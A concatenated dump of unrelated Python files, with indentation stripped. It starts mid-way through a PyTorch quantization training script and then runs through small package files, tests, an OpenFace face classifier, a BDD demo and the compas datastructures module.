# args.start_epoch = checkpoint['epoch']
# best_prec1 = checkpoint['best_prec1']
# model.load_state_dict(checkpoint['state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer'])
# print("=> loaded checkpoint '{}' (epoch {})".format(
# args.resume, checkpoint['epoch']))
# args.checkpoint = os.path.dirname(args.resume)
# logger = Logger(os.path.join(args.checkpoint, 'log.txt'),
# title=title,
# resume=True)
# else:
# print("=> no checkpoint found at '{}'".format(args.resume))
# else:
# logger = Logger(os.path.join(args.checkpoint, 'log.txt'), title=title)
# logger.set_names([
# 'Learning Rate', 'Train Loss', 'Valid Loss', 'Train Acc.',
# 'Valid Acc.'
# ])
cudnn.benchmark = True
# Data loading code
if args.data_backend == 'pytorch':
get_train_loader = get_pytorch_train_loader
get_val_loader = get_pytorch_val_loader
elif args.data_backend == 'dali-gpu':
get_train_loader = get_dali_train_loader(dali_cpu=False)
get_val_loader = get_dali_val_loader()
elif args.data_backend == 'dali-cpu':
get_train_loader = get_dali_train_loader(dali_cpu=True)
get_val_loader = get_dali_val_loader()
#! edit by dongz
train_loader, train_loader_len = get_train_loader(
args.data,
args.batch_size,
workers=args.workers,
input_size=args.input_size)
val_loader, val_loader_len = get_val_loader(args.data,
args.batch_size,
workers=args.workers,
input_size=args.input_size)
# train_loader, train_loader_len = (val_loader, val_loader_len)
#! edit by dongz
if True:
# if args.evaluate:
from collections import OrderedDict
if os.path.isfile(args.weight):
print("=> loading pretrained weight '{}'".format(args.weight))
source_state = torch.load(args.weight)
target_state = OrderedDict()
for k, v in source_state.items():
if k[:7] != 'module.':
k = 'module.' + k
target_state[k] = v
model.load_state_dict(target_state)
else:
print("=> no weight found at '{}'".format(args.weight))
#! edit by dongz
model.eval()
quantize(model)
optimizer = torch.optim.SGD(model.parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})".format(
args.resume, checkpoint['epoch']))
args.checkpoint = os.path.dirname(args.resume)
logger = Logger(os.path.join(args.checkpoint, 'log.txt'),
title=title,
resume=True)
else:
print("=> no checkpoint found at '{}'".format(args.resume))
else:
logger = Logger(os.path.join(args.checkpoint, 'log.txt'),
title=title)
logger.set_names([
'Learning Rate', 'Train Loss', 'Valid Loss', 'Train Acc.',
'Valid Acc.'
])
# model.train()
# print("val val")
validate(val_loader, val_loader_len, model, criterion, -2)
model.train()
# return
# visualization
writer = SummaryWriter(os.path.join(args.checkpoint, 'logs'))
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
print('\nEpoch: [%d | %d]' % (epoch + 1, args.epochs))
# train for one epoch
print("train " + str(epoch) + " epoch")
train_loss, train_acc = train(train_loader, train_loader_len, model,
criterion, optimizer, epoch)
# evaluate on validation set
print("val " + str(epoch) + " epoch")
val_loss, prec1 = validate(val_loader, val_loader_len, model,
criterion, epoch)
lr = optimizer.param_groups[0]['lr']
# append logger file
logger.append([lr, train_loss, val_loss, train_acc, prec1])
# tensorboardX
writer.add_scalar('learning rate', lr, epoch + 1)
writer.add_scalars('loss', {
'train loss': train_loss,
'validation loss': val_loss
}, epoch + 1)
writer.add_scalars('accuracy', {
'train accuracy': train_acc,
'validation accuracy': prec1
}, epoch + 1)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
save_checkpoint(
{
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
'optimizer': optimizer.state_dict(),
},
is_best,
checkpoint=args.checkpoint)
logger.close()
logger.plot()
savefig(os.path.join(args.checkpoint, 'log.eps'))
writer.close()
print('Best accuracy:')
print(best_prec1)
def train(train_loader, train_loader_len, model, criterion, optimizer, epoch):
bar = Bar('Processing', max=train_loader_len)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to train modelkp
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
#! edit by dongz
# adjust_learning_rate(optimizer, epoch, i, train_loader_len)
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1.item(), input.size(0))
top5.update(prec5.item(), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# plot progress
bar.suffix = '({batch}/{size}) Train Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
batch=i + 1,
size=train_loader_len,
data=data_time.avg,
bt=batch_time.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
bar.next()
bar.finish()
return (losses.avg, top1.avg)
def validate(val_loader, val_loader_len, model, criterion, epoch):
bar = Bar('Processing', max=val_loader_len)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
#! add by dongz
quant.eval_mode(True)
end = time.time()
for i, (input, target) in enumerate(val_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1.item(), input.size(0))
top5.update(prec5.item(), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# plot progress
bar.suffix = '({batch}/{size}) Eval Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
batch=i + 1,
size=val_loader_len,
data=data_time.avg,
bt=batch_time.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
bar.next()
bar.finish()
#! add by dongz, updateT for trainning
quant.eval_mode(False)
now_epoch = epoch + 1
if now_epoch in dict_t:
quant.updateT(dict_t[now_epoch])
print("now epoch " + str(now_epoch) + ", now T = " +
str(dict_t[now_epoch]))
return (losses.avg, top1.avg)
def save_checkpoint(state,
is_best,
checkpoint='checkpoint',
filename='checkpoint.pth.tar'):
filepath = os.path.join(checkpoint, filename)
torch.save(state, filepath)
if is_best:
shutil.copyfile(filepath, os.path.join(checkpoint,
'model_best.pth.tar'))
from math import cos, pi
def adjust_learning_rate(optimizer, epoch, iteration, num_iter):
lr = optimizer.param_groups[0]['lr']
warmup_epoch = 5 if args.warmup else 0
warmup_iter = warmup_epoch * num_iter
current_iter = iteration + epoch * num_iter
max_iter = args.epochs * num_iter
if args.lr_decay == 'step':
lr = args.lr * (args.gamma**((current_iter - warmup_iter) /
(max_iter - warmup_iter)))
elif args.lr_decay == 'cos':
lr = args.lr * (1 + cos(pi * (current_iter - warmup_iter) /
(max_iter - warmup_iter))) / 2
elif args.lr_decay == 'linear':
lr = args.lr * (1 - (current_iter - warmup_iter) /
(max_iter - warmup_iter))
elif args.lr_decay == 'schedule':
count = sum([1 for s in args.schedule if s <= epoch])
lr = args.lr * pow(args.gamma, count)
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_decay))
if epoch < warmup_epoch:
lr = args.lr * current_iter / warmup_iter
for param_group in optimizer.param_groups:
param_group['lr'] = lr
#! add by dongz
def metrics():
bar = Bar('Processing', max=val_loader_len)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1.item(), input.size(0))
top5.update(prec5.item(), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# plot progress
bar.suffix = '({batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
batch=i + 1,
size=val_loader_len,
data=data_time.avg,
bt=batch_time.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
bar.next()
bar.finish()
return top1.avg
def steper():
bar = Bar('Processing', max=val_loader_len)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
# measure data loading time
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
quant.step()
def quantize(model, val_loader=None, val_loader_len=None, criterion=None):
global quant
save_path = "./checkpoints"
config_path = './checkpoints/config/config_dev.yaml'
quant = QNQ(model.module, save_path, config_path, metrics, metrics, steper)
model.module = quant.model
# model = torch.nn.DataParallel(model).cuda()
# quant.search()
# dummy_input = torch.randn(10, 3, 224, 224, device='cuda')
# torch.onnx.export(model, dummy_input, "mobilenetv2.onnx", verbose=True)
# validate(val_loader, val_loader_len, model, criterion)
#! torch fx
# import torch.quantization.quantize_fx as quantize_fx
# model.module = quantize_fx.fuse_fx(model.module)
# # debug_count = 0
# tracer = ModulePathTracer()
# g = tracer.trace(model.module)
# gm = torch.fx.GraphModule(model.module, g)
# gm.graph.print_tabular()
# for node in g.nodes:
# module_qualname = tracer.node_to_originating_module.get(node)
# print('Node', node, 'is from module', module_qualname)
# m = dict(gm.named_modules())
# for node in gm.graph.nodes:
# mnode = m.get(tracer.node_to_originating_module.get(node))
# module_qualname = tracer.node_to_originating_module.get(node)
# if node.op == "call_module" and isinstance(
# mnode, nn.Conv2d):
# # debug_count += 1
# with gm.graph.inserting_before(node):
# # st = SigmoidT(m.get(module_qualname))
# st = FXQuantor(mnode)
# gm.add_submodule(module_qualname, st)
# new_node = gm.graph.call_module(module_qualname, node.args,
# node.kwargs)
# node.replace_all_uses_with(new_node)
# # Remove the old node from the graph
# gm.graph.erase_node(node)
# gm.recompile()
# """
# dummy = torch.randn([1, 3, 224, 224]).cuda()
# ir = torch.fx.Interpreter(gm)
# ir.run(dummy)
# """
# gm.graph.print_tabular()
# model.module = gm
pass
def transform():
pass
if __name__ == '__main__':
main()
|
py | b415074f21619d17d5f9ef71fda8fac03dea8066 | from .azureblobio import *
__version__ = '0.1.0'
|
py | b41507f5258f94677dac19b7bb9866eae1776ebe | from .base import AttackGoal
from .classifier_goal import ClassifierGoal |
py | b4150b139396b83081a96b0fb00ad0fb445dfd14 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 3 17:55:52 2021
@author: jacob
"""
"""
Object to hold data about each 96 well plate in an experiment,
including a mapping of where and how replicates are grouped """
class Plate(object):
def __init__(self, name):
self.name = name
self.replicate_map = {}
self.parameter_map = {}
def __repl__(self):
rep = f"{self.name}:\n"
for repl_name in self.replicate_map.keys():
rep += f"{repl_name}: {self.replicate_map[repl_name]}"
return rep
def __str__(self):
rep = f"{self.name}:\n"
for repl_name in self.replicate_map.keys():
rep += f"{repl_name}: {self.replicate_map[repl_name]}\n"
return rep
def add_repl(self, repl_name, wells):
self.replicate_map[repl_name] = wells
# Keeps track of growth rates and ymaxs in each well of the plate
# Note: not safe, wrap in try/catch statement (KeyError)
def add_params(self, gr, ymax, well):
self.parameter_map[well] = [gr, ymax]
# Note: not safe, wrap in try/catch statement (KeyError)
def get_params(self, well):
return self.parameter_map[well][0], self.parameter_map[well][1]
def get_all_params(self):
return self.parameter_map
def get_wells(self, repl_name):
return self.replicate_map[repl_name]
def get_repl_names(self):
return list(self.replicate_map.keys())
def get_plate_name(self):
return self.name
|
py | b4150b542fdc13ba9c08070ac3d789f1b2d5ff67 | from quantum import QRegister, H
def quantum_randbit():
a = QRegister(1, '0')
a.apply(H)
return a.measure()
for i in range(32):
print(quantum_randbit(), end='')
print()
|
py | b4150c800ce80506032d19ddfb1f73c4bcb598e0 | import pytest
from opera.error import ParseError
from opera.parser.tosca.v_1_3.constraint_clause import ConstraintClause
class TestValidate:
def test_valid_clause(self, yaml_ast):
ConstraintClause.validate(yaml_ast("equal: 3"))
def test_invalid_clause(self, yaml_ast):
with pytest.raises(ParseError):
ConstraintClause.validate(yaml_ast("bad_operator: must fail"))
class TestParse:
def test_parse(self, yaml_ast):
ConstraintClause.parse(yaml_ast("in_range: [ 1, 2 ]"))
|
py | b4150d6a79f755e8002fb7cbfdd242e85c8dde10 | import os
import sys
from setuptools import find_packages, setup
from setuptools.command.install import install
VERSION = "0.1.1"
DESCRIPTION = open("README.md", encoding="utf-8").read()
class VerifyVersionCommand(install):
"""Custom command to verify that the git tag matches our version"""
description = "verify that the git tag matches our version"
def run(self):
tag = os.getenv("CIRCLE_TAG")
if tag != VERSION:
info = "Git tag: {0} does not match the version of this app: {1}".format(tag, VERSION)
sys.exit(info)
setup(
name="django-email-tools",
version=VERSION,
packages=find_packages(exclude=["tests"]),
include_package_data=True,
url="https://github.com/pennlabs/django-email-tools",
project_urls={
"Changelog": ("https://github.com/pennlabs/django-email-tools/blob/master/CHANGELOG.md")
},
license="MIT",
author="Penn Labs",
author_email="[email protected]",
description="A collection of Django email tools",
long_description=DESCRIPTION,
long_description_content_type="text/markdown",
install_requires=["django>=2.0.0", "beautifulsoup4<=5"],
classifiers=[
"Framework :: Django",
"Programming Language :: Python",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
python_requires=">=3.6",
cmdclass={"verify": VerifyVersionCommand},
)
|
py | b4150eac7d86b8971619dea802592da5af6c478a | # coding: utf-8
"""
OpsGenie REST API
OpsGenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import opsgenie_swagger
from opsgenie_swagger.models.detectify_integration import DetectifyIntegration # noqa: E501
from opsgenie_swagger.rest import ApiException
class TestDetectifyIntegration(unittest.TestCase):
"""DetectifyIntegration unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDetectifyIntegration(self):
"""Test DetectifyIntegration"""
# FIXME: construct object with mandatory attributes with example values
# model = opsgenie_swagger.models.detectify_integration.DetectifyIntegration() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | b4150f62afc6e9b8d415381d88f21f7dfa5a3f65 | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nemo.collections.nlp.modules.common import (
AlbertEncoder,
BertEncoder,
BertModule,
CamembertEncoder,
DistilBertEncoder,
PromptEncoder,
PromptTable,
RobertaEncoder,
SequenceClassifier,
SequenceRegression,
SequenceTokenClassifier,
get_lm_model,
get_pretrained_lm_models_list,
get_tokenizer,
get_tokenizer_list,
)
from nemo.collections.nlp.modules.dialogue_state_tracking.sgd_decoder import SGDDecoder
from nemo.collections.nlp.modules.dialogue_state_tracking.sgd_encoder import SGDEncoder
|
py | b415100721318dd48c53702254745f610bfd543c | #!/usr/bin/env python2
#
# Example to classify faces.
# Brandon Amos
# 2015/10/11
#
# Copyright 2015-2016 Carnegie Mellon University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
start = time.time()
import argparse
import cv2
import os
import pickle
from operator import itemgetter
import numpy as np
np.set_printoptions(precision=2)
import pandas as pd
import openface
from sklearn.pipeline import Pipeline
from sklearn.lda import LDA
from sklearn.preprocessing import LabelEncoder
from sklearn.svm import SVC
from sklearn.grid_search import GridSearchCV
from sklearn.mixture import GMM
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB
fileDir = os.path.dirname(os.path.realpath(__file__))
modelDir = os.path.join(fileDir, '..', 'models')
dlibModelDir = os.path.join(modelDir, 'dlib')
openfaceModelDir = os.path.join(modelDir, 'openface')
def getRep(imgPath):
start = time.time()
bgrImg = cv2.imread(imgPath)
if bgrImg is None:
raise Exception("Unable to load image: {}".format(imgPath))
rgbImg = cv2.cvtColor(bgrImg, cv2.COLOR_BGR2RGB)
if args.verbose:
print(" + Original size: {}".format(rgbImg.shape))
if args.verbose:
print("Loading the image took {} seconds.".format(time.time() - start))
start = time.time()
bb = align.getLargestFaceBoundingBox(rgbImg)
if bb is None:
raise Exception("Unable to find a face: {}".format(imgPath))
if args.verbose:
print("Face detection took {} seconds.".format(time.time() - start))
start = time.time()
alignedFace = align.align(
args.imgDim,
rgbImg,
bb,
landmarkIndices=openface.AlignDlib.OUTER_EYES_AND_NOSE)
if alignedFace is None:
raise Exception("Unable to align image: {}".format(imgPath))
if args.verbose:
print("Alignment took {} seconds.".format(time.time() - start))
start = time.time()
rep = net.forward(alignedFace)
if args.verbose:
print("Neural network forward pass took {} seconds.".format(
time.time() - start))
return rep
def train(args):
print("Loading embeddings.")
fname = "{}/labels.csv".format(args.workDir)
labels = pd.read_csv(fname, header=None).as_matrix()[:, 1]
labels = map(itemgetter(1),
map(os.path.split,
map(os.path.dirname, labels))) # Get the directory.
fname = "{}/reps.csv".format(args.workDir)
embeddings = pd.read_csv(fname, header=None).as_matrix()
le = LabelEncoder().fit(labels)
labelsNum = le.transform(labels)
nClasses = len(le.classes_)
print("Training for {} classes.".format(nClasses))
if args.classifier == 'LinearSvm':
clf = SVC(C=1, kernel='linear', probability=True)
elif args.classifier == 'GridSearchSvm':
print("""
Warning: In our experiences, using a grid search over SVM hyper-parameters only
gives marginally better performance than a linear SVM with C=1 and
is not worth the extra computations of performing a grid search.
""")
param_grid = [
{'C': [1, 10, 100, 1000],
'kernel': ['linear']},
{'C': [1, 10, 100, 1000],
'gamma': [0.001, 0.0001],
'kernel': ['rbf']}
]
clf = GridSearchCV(SVC(C=1, probability=True), param_grid, cv=5)
elif args.classifier == 'GMM': # Doesn't work best
clf = GMM(n_components=nClasses)
# ref:
# http://scikit-learn.org/stable/auto_examples/classification/plot_classifier_comparison.html#example-classification-plot-classifier-comparison-py
elif args.classifier == 'RadialSvm': # Radial Basis Function kernel
# works better with C = 1 and gamma = 2
clf = SVC(C=1, kernel='rbf', probability=True, gamma=2)
elif args.classifier == 'DecisionTree': # Doesn't work best
clf = DecisionTreeClassifier(max_depth=20)
elif args.classifier == 'GaussianNB':
clf = GaussianNB()
# ref: https://jessesw.com/Deep-Learning/
elif args.classifier == 'DBN':
from nolearn.dbn import DBN
clf = DBN([embeddings.shape[1], 500, labelsNum[-1:][0] + 1], # i/p nodes, hidden nodes, o/p nodes
learn_rates=0.3,
# Smaller steps mean a possibly more accurate result, but the
# training will take longer
learn_rate_decays=0.9,
# a factor the initial learning rate will be multiplied by
# after each iteration of the training
epochs=300, # no of iternation
# dropouts = 0.25, # Express the percentage of nodes that
# will be randomly dropped as a decimal.
verbose=1)
if args.ldaDim > 0:
clf_final = clf
clf = Pipeline([('lda', LDA(n_components=args.ldaDim)),
('clf', clf_final)])
clf.fit(embeddings, labelsNum)
fName = "{}/classifier.pkl".format(args.workDir)
print("Saving classifier to '{}'".format(fName))
with open(fName, 'w') as f:
pickle.dump((le, clf), f)
def infer(args):
with open(args.classifierModel, 'r') as f:
(le, clf) = pickle.load(f)
for img in args.imgs:
print("\n=== {} ===".format(img))
rep = getRep(img).reshape(1, -1)
start = time.time()
predictions = clf.predict_proba(rep).ravel()
maxI = np.argmax(predictions)
person = le.inverse_transform(maxI)
confidence = predictions[maxI]
if args.verbose:
print("Prediction took {} seconds.".format(time.time() - start))
print("Predict {} with {:.2f} confidence.".format(person, confidence))
if isinstance(clf, GMM):
dist = np.linalg.norm(rep - clf.means_[maxI])
print(" + Distance from the mean: {}".format(dist))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--dlibFacePredictor',
type=str,
help="Path to dlib's face predictor.",
default=os.path.join(
dlibModelDir,
"shape_predictor_68_face_landmarks.dat"))
parser.add_argument(
'--networkModel',
type=str,
help="Path to Torch network model.",
default=os.path.join(
openfaceModelDir,
'nn4.small2.v1.t7'))
parser.add_argument('--imgDim', type=int,
help="Default image dimension.", default=96)
parser.add_argument('--cuda', action='store_true')
parser.add_argument('--verbose', action='store_true')
subparsers = parser.add_subparsers(dest='mode', help="Mode")
trainParser = subparsers.add_parser('train',
help="Train a new classifier.")
trainParser.add_argument('--ldaDim', type=int, default=-1)
trainParser.add_argument(
'--classifier',
type=str,
choices=[
'LinearSvm',
'GridSearchSvm',
'GMM',
'RadialSvm',
'DecisionTree',
'GaussianNB',
'DBN'],
help='The type of classifier to use.',
default='LinearSvm')
trainParser.add_argument(
'workDir',
type=str,
help="The input work directory containing 'reps.csv' and 'labels.csv'. Obtained from aligning a directory with 'align-dlib' and getting the representations with 'batch-represent'.")
inferParser = subparsers.add_parser(
'infer', help='Predict who an image contains from a trained classifier.')
inferParser.add_argument(
'classifierModel',
type=str,
help='The Python pickle representing the classifier. This is NOT the Torch network model, which can be set with --networkModel.')
inferParser.add_argument('imgs', type=str, nargs='+',
help="Input image.")
args = parser.parse_args()
if args.verbose:
print("Argument parsing and import libraries took {} seconds.".format(
time.time() - start))
if args.mode == 'infer' and args.classifierModel.endswith(".t7"):
raise Exception("""
Torch network model passed as the classification model,
which should be a Python pickle (.pkl)
See the documentation for the distinction between the Torch
network and classification models:
http://cmusatyalab.github.io/openface/demo-3-classifier/
http://cmusatyalab.github.io/openface/training-new-models/
Use `--networkModel` to set a non-standard Torch network model.""")
start = time.time()
align = openface.AlignDlib(args.dlibFacePredictor)
net = openface.TorchNeuralNet(args.networkModel, imgDim=args.imgDim,
cuda=args.cuda)
if args.verbose:
print("Loading the dlib and OpenFace models took {} seconds.".format(
time.time() - start))
start = time.time()
if args.mode == 'train':
train(args)
elif args.mode == 'infer':
infer(args)
|
py | b41510616714ef2355260c2a7b84ccfe1c723005 | import repycudd
import sym_dot
from bidict import bidict # to install use pip install bidict
mgr = repycudd.DdManager()
x0 = mgr.IthVar(0)
x1 = mgr.IthVar(1)
x2 = mgr.IthVar(2)
x3 = mgr.IthVar(3)
x4 = mgr.IthVar(4)
x5 = mgr.IthVar(5)
x6 = mgr.IthVar(6)
x7 = mgr.IthVar(7)
x8 = mgr.IthVar(8)
x9 = mgr.IthVar(9)
x10 = mgr.IthVar(10)
x11 = mgr.IthVar(11)
t1 = mgr.And(mgr.And(x0,x1), mgr.And(x2,x3))
t2 = mgr.And(mgr.And(x4,x5), mgr.And(x6,x7))
t3 = mgr.And(mgr.And(x8,x9), mgr.And(x10,x11))
f = mgr.And(mgr.And(t1,t2),t3)
output = repycudd.DdArray(mgr, 1)
output.Push(mgr.BddToAdd(f))
mgr.DumpDotArray(output, 'testfile.dot')
var_dict = bidict({"x0" : "0", "x1" : "1", "x2" : "2", "x3" : "3", "x4" : "4", "x5" : "5", "x6" : "6", "x7" : "7", "x8" : "8", "x9" : "9", "x10" : "10", "x11" : "11"})#var_dict = {"0" : "x0", "1" : "x1", "2" : "x2", "3" : "x3", "4" : "x4", "5" : "x5", "6" : "x6", "7" : "x7", "8" : "x8", "9" : "x9", "10" : "x10", "11" : "x11"}
sym_dot.sym_dot_manager("testfile.dot", var_dict).add_syms()
|
py | b41510cc8fa445781040bdc67e62d8df9b27697a | """
********************************************************************************
datastructures
********************************************************************************
.. currentmodule:: compas.datastructures
Classes
=======
.. autosummary::
:toctree: generated/
:nosignatures:
Datastructure
Graph
HalfEdge
HalfFace
Mesh
Network
VolMesh
Functions
=========
Network
-------
.. autosummary::
:toctree: generated/
:nosignatures:
network_complement
network_count_crossings
network_disconnected_edges
network_disconnected_nodes
network_embed_in_plane_proxy
network_embed_in_plane
network_explode
network_find_crossings
network_find_cycles
network_is_connected
network_is_crossed
network_is_planar_embedding
network_is_planar
network_is_xy
network_join_edges
network_polylines
network_shortest_path
network_smooth_centroid
network_split_edge
network_transform
network_transformed
.. autosummary::
:toctree: generated/
:nosignatures:
network_adjacency_matrix
network_connectivity_matrix
network_degree_matrix
network_laplacian_matrix
Mesh
----
.. autosummary::
:toctree: generated/
:nosignatures:
mesh_add_vertex_to_face_edge
mesh_bounding_box_xy
mesh_bounding_box
mesh_collapse_edge
mesh_connected_components
mesh_conway_ambo
mesh_conway_bevel
mesh_conway_dual
mesh_conway_expand
mesh_conway_gyro
mesh_conway_join
mesh_conway_kis
mesh_conway_meta
mesh_conway_needle
mesh_conway_ortho
mesh_conway_snub
mesh_conway_truncate
mesh_conway_zip
mesh_delete_duplicate_vertices
mesh_disconnected_faces
mesh_disconnected_vertices
mesh_dual
mesh_explode
mesh_face_adjacency
mesh_flatness
mesh_flip_cycles
mesh_insert_vertex_on_edge
mesh_is_connected
mesh_merge_faces
mesh_offset
mesh_planarize_faces
mesh_quads_to_triangles
mesh_slice_plane
mesh_smooth_area
mesh_smooth_centerofmass
mesh_smooth_centroid
mesh_split_edge
mesh_split_face
mesh_split_strip
mesh_subdivide_catmullclark
mesh_subdivide_corner
mesh_subdivide_doosabin
mesh_subdivide_frames
mesh_subdivide_quad
mesh_subdivide_tri
mesh_subdivide
mesh_substitute_vertex_in_faces
mesh_thicken
mesh_transform
mesh_transformed
mesh_unify_cycles
mesh_unweld_edges
mesh_unweld_vertices
mesh_weld
meshes_join_and_weld
meshes_join
trimesh_collapse_edge
trimesh_face_circle
trimesh_gaussian_curvature
trimesh_mean_curvature
trimesh_remesh
trimesh_split_edge
trimesh_subdivide_loop
trimesh_swap_edge
.. autosummary::
:toctree: generated/
:nosignatures:
mesh_adjacency_matrix
mesh_connectivity_matrix
mesh_contours_numpy
mesh_degree_matrix
mesh_face_matrix
mesh_geodesic_distances_numpy
mesh_isolines_numpy
mesh_laplacian_matrix
mesh_oriented_bounding_box_numpy
mesh_oriented_bounding_box_xy_numpy
mesh_transform_numpy
mesh_transformed_numpy
trimesh_cotangent_laplacian_matrix
trimesh_descent
trimesh_pull_points_numpy
trimesh_samplepoints_numpy
trimesh_smooth_laplacian_cotangent
trimesh_vertexarea_matrix
VolMesh
-------
.. autosummary::
:toctree: generated/
:nosignatures:
volmesh_bounding_box
volmesh_transform
volmesh_transformed
"""
from __future__ import absolute_import
import compas
from .datastructure import Datastructure
from .graph import (
Graph
)
from .network import (
Network,
network_complement,
network_count_crossings,
network_disconnected_edges,
network_disconnected_nodes,
network_embed_in_plane_proxy,
network_embed_in_plane,
network_explode,
network_find_crossings,
network_find_cycles,
network_is_connected,
network_is_crossed,
network_is_planar_embedding,
network_is_planar,
network_is_xy,
network_join_edges,
network_polylines,
network_shortest_path,
network_smooth_centroid,
network_split_edge,
network_transform,
network_transformed,
)
from .halfedge import (
HalfEdge
)
from .mesh import (
Mesh,
mesh_add_vertex_to_face_edge,
mesh_bounding_box_xy,
mesh_bounding_box,
mesh_collapse_edge,
mesh_connected_components,
mesh_conway_ambo,
mesh_conway_bevel,
mesh_conway_dual,
mesh_conway_expand,
mesh_conway_gyro,
mesh_conway_join,
mesh_conway_kis,
mesh_conway_meta,
mesh_conway_needle,
mesh_conway_ortho,
mesh_conway_snub,
mesh_conway_truncate,
mesh_conway_zip,
mesh_delete_duplicate_vertices,
mesh_disconnected_faces,
mesh_disconnected_vertices,
mesh_dual,
mesh_explode,
mesh_face_adjacency,
mesh_flatness,
mesh_flip_cycles,
mesh_insert_vertex_on_edge,
mesh_is_connected,
mesh_merge_faces,
mesh_offset,
mesh_planarize_faces,
mesh_quads_to_triangles,
mesh_slice_plane,
mesh_smooth_area,
mesh_smooth_centerofmass,
mesh_smooth_centroid,
mesh_split_edge,
mesh_split_face,
mesh_split_strip,
mesh_subdivide_catmullclark,
mesh_subdivide_corner,
mesh_subdivide_doosabin,
mesh_subdivide_frames,
mesh_subdivide_quad,
mesh_subdivide_tri,
mesh_subdivide,
mesh_substitute_vertex_in_faces,
mesh_thicken,
mesh_transform,
mesh_transformed,
mesh_unify_cycles,
mesh_unweld_edges,
mesh_unweld_vertices,
mesh_weld,
meshes_join_and_weld,
meshes_join,
trimesh_collapse_edge,
trimesh_face_circle,
trimesh_gaussian_curvature,
trimesh_mean_curvature,
trimesh_remesh,
trimesh_split_edge,
trimesh_subdivide_loop,
trimesh_swap_edge,
)
from .halfface import (
HalfFace
)
from .volmesh import (
VolMesh,
volmesh_bounding_box,
